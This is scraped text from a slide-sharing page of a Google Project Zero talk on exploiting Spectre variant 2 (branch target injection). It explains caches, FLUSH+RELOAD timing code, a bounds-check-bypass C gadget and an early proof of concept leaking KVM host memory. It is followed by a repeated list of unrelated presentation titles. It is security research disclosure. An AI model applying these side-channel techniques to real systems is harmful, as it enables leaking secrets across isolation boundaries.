Exploiting Branch Target Injection Jann Horn, Google Project Zero - PowerPoint PPT Presentation

Exploiting Branch Target Injection Jann Horn, Google Project Zero 1

Outline ● Introduction ● Reverse-engineering branch prediction ● Leaking host memory from KVM 2

Disclaimer ● I haven't worked in CPU design ● I don't really understand how CPUs work ● Large parts of this talk are based on guesses ● This isn't necessarily how all CPUs work 3

Variants overview Spectre Meltdown ● CVE-2017-5753 ● CVE-2017-5715 ● CVE-2017-5754 ● Variant 1 ● Variant 2 ● Variant 3 ● Bounds Check ● Branch Target ● Rogue Data Cache Bypass Injection Load ● Primarily affects ● Primarily affects ● Affects kernels (and interpreters/JITs kernels/hypervisors architecturally equivalent software) 4

Performance ● Modern consumer CPU clock rates: ~4GHz ● Memory is slow: ~170 clock cycles latency on my machine CPU needs to work around high memory access latencies ➢ ● Adding parallelism is easier than making processing faster CPU needs to do things in parallel for performance ➢ ● Performance optimizations can lead to security issues! 5

Performance Optimization Resources ● everyone wants programs to run fast processor vendors want application authors to be able to write fast code ➢ ● architectural behavior requires architecture documentation; performance optimization requires microarchitecture documentation if you want information about microarchitecture, read performance ➢ optimization guides ● Intel: https://software.intel.com/en-us/articles/intel-sdm#optimization ("optimization reference manual") ● AMD: https://developer.amd.com/resources/developer-guides-manuals/ ("Software Optimization Guide") 6

(vaguely based on optimization manuals) Out-of-order execution front end port out-of-order engine (scheduler, renaming, ...) port instruction stream port add rax, 9 add rax, 8 inc rbx inc rbx sub rax, rbx port mov [rcx], rax cmp rax, 16 port ... port sub rax, rbx port decoder port cmp rax, 16 mov [rcx], rax micro-op stream reorder buffer (~200 entries) retire 7

Data caching processor ● caches store memory in core chunks of 64 bytes ("cache lines") L1D cache L2 cache CLFLUSH ● multiple levels of cache (on readable ● L1D is fast, L3 is slower, mappings) L3 cache main memory is very slow main memory 8

Side Channels, Covert Channels ● performance/timing of process A is affected by process B ● side channel: process A can infer what process B is doing (uncooperatively) ● covert channel: process B can deliberately transmit information to process A ● side channels can often also be used as covert channels victim attacker (leaking) (sending) intended isolation of data flow side covert channel channel attacker attacker (measuring) (receiving) 9

Side Channels, Covert Channels: FLUSH+RELOAD For measuring accesses to shared victim (leaking) foo = read-only memory (.rodata / .text / ro_array[secret]; zero page / vsyscall page / ...): 1. process A flushes cache line using CLFLUSH FLUSH+RELOAD side 2. process B maybe accesses channel cache line 3. process A accesses cache attacker (measuring) line, measuring access time clflush [addr] [... wait ...] rdtsc Limited applicability, but simple and mov eax, [addr] fast 10 rdtsc

log 2 (cacheline_size) bits (e.g. 6) N-way caches; Eviction log 2 (num_buckets) bits (e.g. 6) ● used in data caches and elsewhere address tag set ... ● software equivalent: think "hashmap set 0 tag0, tag1, tag2, tag3, with fixed-size arrays as buckets" value0 value1 value2 value3 ● fixed size: adding new entries removes set 1 tag0, tag1, tag2, tag3, older ones value0 value1 value2 value3 attacker can flush a set from the cache ➢ set 2 tag0, tag1, tag2, tag3, by adding new entries ( eviction value0 value1 value2 value3 strategy ) ... ... ... ... ... ○ strategy for Intel L3 caches described in the rowhammer.js paper by Daniel Gruss, Clémentine Maurice, Stefan Mangard set tag0, tag1, tag2, tag3, ● (simplified: Intel L3 set selection is more complex, 63 value0 value1 value2 value3 see research by Clementine Maurice et al.) 11

Branch Prediction ● processor predicts outcomes of branches ● predictions are based on previous behavior ● predictions help with executing more things in parallel 12

Misspeculation ● Exceptions and incorrect branch prediction can cause “rollback” of transient instructions ● Old register states are preserved, can be restored ● Memory writes are buffered, can be discarded Intuition: Transient instructions are sandboxed ➢ Covert channels matter ➢ ● Cache modifications are not restored! 13

Covert channel out of misspeculation ● Sending via FLUSH+RELOAD covert channel works from transient instructions branch / faulting instruction incorrectly architectural predicted target control flow architecturally executed transient instructions instructions cache-based covert channel 14

Variant 1: Abusing conditional branch misprediction struct array { unsigned long length; unsigned char data[]; }; struct array *arr1 = ...; /* array of size 0x100 */ struct array *arr2 = ...; /* array of size 0x400 */ /* >0x100 (OUT OF BOUNDS!) */ unsigned long untrusted_index = ...; if (untrusted_index < arr1->length) { mispredicted branch; ->length read must be slow! char value = arr1->data[untrusted_index]; speculatively unbounded read unsigned long index2 = ((value&1)*0x100)+0x200; sending on covert channel unsigned char value2 = arr2->data[index2]; } 15

Branch Prediction: Other patterns (UNTESTED) ● type check struct foo_ops { void (*bar)(void); ● NULL pointer dereference }; ● out-of-bounds access into object struct foo { struct foo_ops *ops; table with function pointers }; struct foo **foo_array; size_t foo_array_len; void do_bar(size_t idx) { if (idx >= foo_array_len) return; foo_array[idx]->ops->bar(); } 16

Indirect Branches ● instruction stream does not kvm_x86_ops->handle_external_intr(vcpu); contain target addresses struct kvm_x86_ops *kvm_x86_ops; ● target must be fetched from memory static struct kvm_x86_ops vmx_x86_ops = { ● CPU will speculate about branch [...] .handle_external_intr = target vmx_handle_external_intr, [...] }; [code simplified] 17

Variant 2: Basics ● Branch predictor state is stored in a Branch Target Buffer (BTB) ○ Indexed and tagged by (on Intel Haswell): ■ partial virtual address ■ recent branch history fingerprint [sometimes] ● Branch prediction is expected to sometimes be wrong ● Unique tagging in the BTB is unnecessary for correctness ● Many BTB implementations do not tag by security domain ● Prior research: Break Address Space Layout Randomization (ASLR) across security domains ("Jump over ASLR" paper) ● Inject misspeculation to controlled addresses across security domains ● Attack goal: Leak host memory from inside a KVM guest 18

Known predictor internals "Jump over ASLR" paper on direct branch Intel Optimization Manual on Intel Core uarch: prediction: ● predictions are calculated for 32-byte ● bits 0-30 of the source go into BTB blocks of source instructions indexing function ● conditional branches: predicts both ● BTB collisions between userspace taken/not taken and target address processes are possible ● indirect branches: two prediction modes: ■ "monotonic target" ● BTB collisions between userspace and ■ "targets that vary in accordance with kernel are possible recent program behavior" https://github.com/felixwilhelm/mario_baslr: ● BTB collisions between VT-x guest and host are possible 19

process 1 process 2 Minimal Test CLFLUSH indirect call target pointer ● run two processes in parallel ● on same physical core series of N taken conditional branches (hyperthreaded) ● same code indirect call ● same memory layout (no ASLR) ● different indirect call targets misprediction ● process 1: normally measures and flushes test variable in a loop measure test variable read test variable ● target injection from process 2 access time into process 1 can cause extra load CLFLUSH test variable ● [explicit execution barriers omitted from diagram] 20

Variant 2: first brittle PoC [in initial writeup] ● minimize the problem for a minimal PoC: ○ add cheats for finding host addresses ○ add cheat for flushing host cacheline with function pointers ● use BTB structure information from prior research ("Jump over ASLR" paper) ○ Source address: low 31 bits ○ "Jump over ASLR" looked at prediction for direct branches! ● collide low 31 bits of source address, assume relative target leak rate: ~6 bits/second ➢ almost all the injection attempts fail! ➢ somehow the CPU can distinguish injections and hypervisor execution ➢ Theory: ➢ ○ injection only works for "monotonic target" prediction ○ CPU prefers history-based prediction 21 ○ injection works when history-based prediction fails due to system noise causing evictions

Exploiting Branch Target Injection Jann Horn, Google Project Zero - PowerPoint PPT Presentation

Exploiting Branch Target Injection Jann Horn, Google Project Zero 1 Outline Introduction Reverse-engineering branch prediction Leaking host memory from KVM 2 Disclaimer I haven't worked in CPU design I don't

SELF SE SELF SE SE SELF SE SELF LF-INJECTION LF LF LF-INJECTION INJECTION INJECTION

A1 (Part 2): Injection SQL Injection SQL injection is prevalent SQL injection is impactful Why a

Title node 1 branch 1 branch 2 node 2 root branch 3 node 3 branch 4 node 4 Title node

5.2) Injections (part 2) Shell Injection, XML Injection, LDAP injection Emmanuel Benoist Spring

9.4 Local Perception Filters 9.4 Local Perception Filters Exploiting Exploiting Perceptual

A1 (Part 1): Injection Command and Code injection A1 Injection Tricking an application

A1 (Part 3): Injection Blind SQL Injection Blind SQL Injection SQL injectio ion that tricks ks

Polymer Engineering Polymer Engineering (MM3POE) (MM3POE) INJECTION MOULDING INJECTION

CS 104 Computer Organization and Design Branch Prediction CS104:Branch Prediction 1 Branch

Blackout: What Really Happened Jamie Butler and Kris Kendall Outline Code Injection Basics

Hitachi NEXT 2018 Automating Onboarding Data with Metadata Injection Contents Page 2:

Injection mismatch type of injection mismatch will lead to an emittance blow-up. Off axis

www.adduxi.com HIGH QUALITY INJECTION ADDUXI IS A MANUFACTURER OF HIGH-PRECISION INDUSTRIAL

Target Risk vs. Target Date Funds in 401(k) Plans: Maybe the answer is both January 14, 2015

California State Disability Insurance 2012 EDD Unemploy. Policy Public Work. Disability

1 Predictor for a Single Branch Branch History Table of 1-bit Predictor BHT also Called Branch

COVID Crisis Monumental Changes for Health Care 1 MOSHPIT MASKS OUTDOORS SOCIAL DISTANCING

Win32 Exploit Development with pvefindaddr Peter Van Eeckhoutte 2011 Peter

SUSTAINING WELLNESS: STRESS, COPING, IMMUNITY & RESILIENCE Christopher Fagundes, Ph.D.

Modeling Allocation Strategies for the Initial SARS-CoV-2 Vaccine Supply Rachel B. Slayton, PhD,

On the Fast Algebraic Immunity of Majority Functions Pierrick M AUX ICTEAM/ELEN/Crypto Group,

Lecture 8.1: Modeling with nonlinear systems Matthew Macauley Department of Mathematical Sciences

TARRANT COUNTY COLLEGE DISTRICT VOCATIONAL NURSING Mission We prepare skilled nurses to deliver

On Enforcing the Digital Immunity of a Large Humanitarian Organization Stevens Le Blond ,

Exploiting Branch Target Injection Jann Horn, Google Project Zero - PowerPoint PPT Presentation

Exploiting Branch Target Injection Jann Horn, Google Project Zero 1 Outline Introduction Reverse-engineering branch prediction Leaking host memory from KVM 2 Disclaimer I haven't worked in CPU design I don't

SELF SE SELF SE SE SELF SE SELF LF-INJECTION LF LF LF-INJECTION INJECTION INJECTION

A1 (Part 2): Injection SQL Injection SQL injection is prevalent SQL injection is impactful Why a

Title node 1 branch 1 branch 2 node 2 root branch 3 node 3 branch 4 node 4 Title node

5.2) Injections (part 2) Shell Injection, XML Injection, LDAP injection Emmanuel Benoist Spring

9.4 Local Perception Filters 9.4 Local Perception Filters Exploiting Exploiting Perceptual

A1 (Part 1): Injection Command and Code injection A1 Injection Tricking an application

A1 (Part 3): Injection Blind SQL Injection Blind SQL Injection SQL injectio ion that tricks ks

Polymer Engineering Polymer Engineering (MM3POE) (MM3POE) INJECTION MOULDING INJECTION

CS 104 Computer Organization and Design Branch Prediction CS104:Branch Prediction 1 Branch

Blackout: What Really Happened Jamie Butler and Kris Kendall Outline Code Injection Basics

Hitachi NEXT 2018 Automating Onboarding Data with Metadata Injection Contents Page 2:

Injection mismatch type of injection mismatch will lead to an emittance blow-up. Off axis

www.adduxi.com HIGH QUALITY INJECTION ADDUXI IS A MANUFACTURER OF HIGH-PRECISION INDUSTRIAL

Target Risk vs. Target Date Funds in 401(k) Plans: Maybe the answer is both January 14, 2015

California State Disability Insurance 2012 EDD Unemploy. Policy Public Work. Disability

1 Predictor for a Single Branch Branch History Table of 1-bit Predictor BHT also Called Branch

COVID Crisis Monumental Changes for Health Care 1 MOSHPIT MASKS OUTDOORS SOCIAL DISTANCING

Win32 Exploit Development with pvefindaddr Peter Van Eeckhoutte 2011 Peter

SUSTAINING WELLNESS: STRESS, COPING, IMMUNITY &amp; RESILIENCE Christopher Fagundes, Ph.D.

Modeling Allocation Strategies for the Initial SARS-CoV-2 Vaccine Supply Rachel B. Slayton, PhD,

On the Fast Algebraic Immunity of Majority Functions Pierrick M AUX ICTEAM/ELEN/Crypto Group,

Lecture 8.1: Modeling with nonlinear systems Matthew Macauley Department of Mathematical Sciences

TARRANT COUNTY COLLEGE DISTRICT VOCATIONAL NURSING Mission We prepare skilled nurses to deliver

On Enforcing the Digital Immunity of a Large Humanitarian Organization Stevens Le Blond ,

SUSTAINING WELLNESS: STRESS, COPING, IMMUNITY & RESILIENCE Christopher Fagundes, Ph.D.